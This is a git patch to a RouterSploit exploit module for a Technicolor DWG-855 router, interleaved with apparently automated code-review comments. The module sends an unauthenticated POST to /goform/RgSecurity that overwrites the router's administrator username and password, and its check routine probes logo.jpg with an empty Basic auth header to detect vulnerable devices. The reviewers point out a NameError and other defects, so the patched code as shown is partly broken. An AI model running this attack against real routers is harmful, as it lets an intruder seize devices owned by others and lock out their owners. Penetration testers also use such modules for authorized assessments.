From 2d2b24c224a4a8d877eb94821f97ec347cea544a Mon Sep 17 00:00:00 2001
From: 0BuRner <0BuRner@users.noreply.github.com>
Date: Sun, 13 Nov 2016 17:45:00 +0100
Subject: [PATCH] Update dwg855_authbypass.py

---
 routersploit/modules/exploits/technicolor/dwg855_authbypass.py | 44 +++++++++++++++++++++++++++++---------------
 1 file changed, 29 insertions(+), 15 deletions(-)

diff --git a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
index a3759e5..019bdc8 100644
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -1,14 +1,15 @@
-import base64
+import binascii
 
-from routersploit import(
+from routersploit import (
     exploits,
     print_success,
     print_error,
+    print_status,
     sanitize_url,
     http_request,
-    mute
 )
 
+
 class Exploit(exploits.Exploit):
     """
     Exploit implementation for Technicolor DWG-855 Authentication Bypass vulnerability.
@@ -16,10 +17,10 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'Technicolor DWG-855 Authentication Bypass vulnerability.',
-        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.\nNOTE2: run \"check\" after runing module to see if it worked.',
-        'authors': [
-            'JPaulMora',  # vulnerability discovery
-            'JPaulMora <https://JPaulMora.GitHub.io>',  # routersploit module
+        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous username&pass, this is NOT stealty.',
+        'author': [
+            'JPaulMora <https://JPaulMora.GitHub.io>',
+            # vulnerability discovery,routersploit module
         ],
         'references': [
             'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
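Review bot: The `__info__` key is renamed from `'authors'` to `'author'` on the new side, and the removed line suggests `'authors'` is what this module tree uses; if the framework's module listing reads `'authors'`, this rename silently drops the author from the display, so confirm the expected key before merging. The comment `# vulnerability discovery,routersploit module` is now a stranded line inside the list rather than a per-entry annotation; either drop it or put it back beside the entry it describes, e.g. `'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module`. The description string also keeps the typos "errase" and "stealty"; that is user-facing text and could be corrected in the same touch.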
@@ -35,24 +36,35 @@ class Exploit(exploits.Exploit):
     npass = exploits.Option('rpass', 'Overwrite old password with.. ')
 
     def run(self):
+        print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
         url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
         headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
-        data = {"HttpUserId":self.nuser, "Password":self.npass, "PasswordReEnter":self.npass, "RestoreFactoryNo":"0x00"}
+        data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
 
         response = http_request(method="POST", url=url, headers=headers, data=data)
-        return ""
 
-    @mute
+        if response is None:
+            print_error("Target didn't answer request.")
+        elif vulnresp in response.text.encode('utf-8'):
+            print_success("Credentials changed!")
+        elif response.status_code == 401:
+            print_error("Target answered, denied access.")
+        else:
+            print_error("Unknown error, submit an issue.")
+
     def check(self):
-        url = sanitize_url("{}:{}/RgConnect.asp".format(self.target, self.port))
+
+        # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
+        vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+
+        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
         user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-        authorization = 'Basic {}'.format(base64.b64encode(self.nuser + ':' + self.npass))
         headers = {'User-Agent': user_agent,
                    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                    'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
                    'Connection': 'keep-alive',
                    'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': authorization,
+                   'Authorization': 'Og==',  # this is base64(":")
                    'Cache-Control': 'no-cache',
                    'Connection': 'close'}
 
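Review bot: `vulnresp` on the new `elif vulnresp in response.text.encode('utf-8')` line in `run()` is not defined in that method, it only exists as a local of `check()` further down, so any non-None response makes `run()` raise NameError before reporting anything. Hoist the marker to class scope, `vulnresp = binascii.unhexlify('114475636b7900')`, and reference it as `self.vulnresp` in both methods. Comparing against `response.text.encode('utf-8')` is also fragile for a binary body, since the text property is decoded with whatever charset the server advertises and non-text bytes such as 0x11 and 0x00 need not survive the decode/re-encode round trip; assuming `http_request` returns a requests-style response, `self.vulnresp in response.content` compares the raw bytes, and the same pattern recurs in the `check()` hunk below. Separately, testing a form POST's response for the image marker appears to be copied from `check()`; it is unclear from this hunk that the RgSecurity response ever contains it, so a successful change may be reported as "Unknown error". The `check()` body continues past the end of this hunk.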
@@ -60,7 +72,9 @@ class Exploit(exploits.Exploit):
 
         if response is None:
             return False  # target is not vulnerable
-        if response.status_code == 401:
+        elif vulnresp in response.text.encode('utf-8'):
+            return True  # device is vulnerable
+        elif response.status_code == 401:
             return False  # target is not vulnerable
         else:
-            return True  # device is vulnerable
+            return False  # target is not vulnerable
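Review bot: The `elif response.status_code == 401` branch and the final `else` now both `return False`, so the status-code test is dead and the three trailing branches collapse to a single `return vulnresp in response.text.encode('utf-8')` after the `response is None` guard (or `response.content`, see the note on the previous hunk about comparing raw bytes). The `check()` signature and the request itself are outside this hunk.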
--
libgit2 0.26.0